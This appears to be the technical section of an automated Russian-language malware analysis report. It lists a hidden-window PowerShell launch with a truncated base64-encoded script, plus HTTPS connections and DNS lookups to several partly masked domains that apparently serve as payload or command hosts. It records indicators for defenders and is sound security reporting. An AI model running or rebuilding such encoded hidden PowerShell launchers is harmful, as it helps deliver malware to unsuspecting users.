Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAGQAdwBhAG0AeQBuAHMAaABsAD0AJwBRAG0AcAB2AHgAbwBuAHoAJwA7ACQAUwB0AHkAegB5AGUAdAB4ACAAPQAgACcAOQA3AD...
- 'fe####alcigar.com':443
- 'ca####lchron.com':443
- 'fo##ast.cl':443
- 'te######domicilio.com.mx':443
- 'fe####alcigar.com':443
- 'fo##ast.cl':443
- 'te######domicilio.com.mx':443
- DNS ASK fe####alcigar.com
- DNS ASK ca####lchron.com
- DNS ASK th#####nsawshack.com
- DNS ASK fo##ast.cl
- DNS ASK te######domicilio.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAGQAdwBhAG0AeQBuAHMAaABsAD0AJwBRAG0AcAB2AHgAbwBuAHoAJwA7ACQAUwB0AHkAegB5AGUAdAB4ACAAPQAgACcAOQA3AD...' (со скрытым окном)